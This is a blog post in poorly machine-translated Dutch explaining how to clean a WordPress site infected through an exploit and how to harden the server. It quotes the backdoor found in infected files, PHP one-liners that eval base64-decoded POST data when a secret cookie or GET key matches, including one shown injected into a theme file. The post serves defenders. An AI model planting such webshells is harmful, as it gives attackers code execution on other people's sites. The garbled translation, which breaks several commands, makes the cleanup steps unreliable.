WordPress Exploit - Geïnfecteerde bestanden opschonen, en SQL Server-beveiliging.

Voordat je dit bericht leest, ziet u , Om iets te begrijpen. :)

Ik vond meerdere bestanden van blogs op stealthsettings.com codes lijken op die hieronder, die voortvloeien uit de virusarii met WordPress exploiteren.:

<? Php if ($ _ GET [ '573abcb060974771'] == "8e96d1b4b674e1d2") {eval (base64_decode ($ _ POST [ 'file'])); exit; }?>

si

<?php if($_COOKIE[XCHARX44e827f9fbeca184XCHARX]==XCHARX5cd3c94b4b1c57eaXCHARX){ eval(base64_decode($_POST[XCHARXfileXCHARX])); exit; } ?>

xmlrpcIn het bovenstaande geval is ongeveer file xmlrpc.php van SlaperigMaar bij een grep server, kunt u zien dat er heel wat van zijn soort in de broncode.

pppffiuuu

Geïnfecteerde bestanden opschonen:

Ooookkkk ...
1. De beste oplossing, nadat het gedaan backupCPC en gereinigd database is om verwijderen bestanden WordPress (Wp-config.php en kan bestanden die geen betrekking hebben strikt WP-platform, na zorgvuldig gecontroleerd te houden) op de server en niet het uploaden van de originele versie 2.5.1 (Bij deze gelegenheid maakt een upgradeversie wp :)) http://wordpress.org/download/ . verwijderen van bestanden met inbegrip van thema, als je het vertrouwen dat je ze goed kunt controleren hebben.

Het is duidelijk dat de bestanden werden getroffen en de thema's die nog nooit zijn gebruikt op de blog en eenvoudig wijzigen van het thema, dit probleem niet oplossen.

./andreea/wp-content/themes/default/index.php:<?php if ($ _ COOKIE [ '44e827f9fbeca184'] == "5cd3c94b4b1c57ea") {eval (base64_decode ($ _ POST [ 'file'])); exit; ?}> <Php get_header (); ?>

2. Zoek en verwijder alle bestanden met: * _new.php, _old.php * * .jpgg, .giff * * .pngg en bestand wp-info.txt, indien van toepassing.

vinden. -name '* _new.php "
vinden. -name '* _old.php "
vinden. -name '* .jpgg "
vinden. -name '* _giff "
vinden. -name '* _pngg "
vinden. -name 'wp-info.txt "

3. in / tmp , Zoek en mappen zoals verwijderen tmpYwbzT2

schoonmaak SQL :

1. in tabel Tabel wp_options zien of er wordt verwijdert de lijnen: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Ook in wp_options, gaat u naar active_plugins en verwijderen als er een plugin die eindigt in een van de extensies * _new.php, * _old.php, *. jpgg, *. giff, *. pngg of als een ander toestel wordt vermoed, kijk goed.

3. In Tabel wp_usersZie als er een gebruiker die niets heeft geschreven in zijn rechter, de kolom user_nicename. Verwijder deze gebruiker, maar let op het nummer op de ID-kolom. Deze gebruiker kan "WordPress" als USER_LOGIN en lijkt te zijn gemaakt op 00: 00: 00 0000-00-00.

4. Ga naar de tabel wp_usermeta en verwijder alle lijnen behoren ID hierboven.

Nadat je dit hebt gedaan sql reiniging, uitschakelen en vervolgens in staat stellen een aantal plug-in. (In blog -> Dashboard -> Plugins)

Beveiligde server:

1. Zie welke mappen en bestanden zijn "beschrijfbaar"(Chmod 777) en probeer te zetten op hen een chmod dat hun schrijven zou niet toestaan ​​dat op elk niveau. (644 chmod bijvoorbeeld)

Zoeken. -Perm-2-ls

2. Zien welke bestanden het bit aan suid of sgid . Als u geen gebruik maken van de bestanden op hen chmod 0 of verwijderen van de verpakking die het bevat. Zijn zeer gevaarlijk, omdat ze uit te voeren privileges "groep"Of"wortel"En niet met normale gebruikersrechten om dat bestand uit te voeren.

find /-type f-perm-04000-ls
find /-type f-perm-02000-ls

3. Controleer welke poorten open staan ​​en proberen te sluiten of te beveiligen die niet worden gebruikt.

netstat-an | grep-i listen

Over. Ik zie Google Search en anderen zeggen: "Nou, je deed!". Wel goed je hebt gedaan ... maar hoe zit het als google begint te verbieden om alle sites het vormen van IS SPAM en zet Trojans (Trojan.Clicker.HTML) In cookies?

WordPress Exploit - Geïnfecteerde bestanden opschonen, en SQL Server-beveiliging.

Over de auteur

heimelijkheid

Gepassioneerd door alles wat gadgets en IT betekent, schrijf ik met plezier stealthsettings.com van 2006 en ik ontdek graag nieuwe dingen over computers en besturingssystemen macOS, Linux, Windows, iOS en Android.

hoe 1

Laat een bericht achter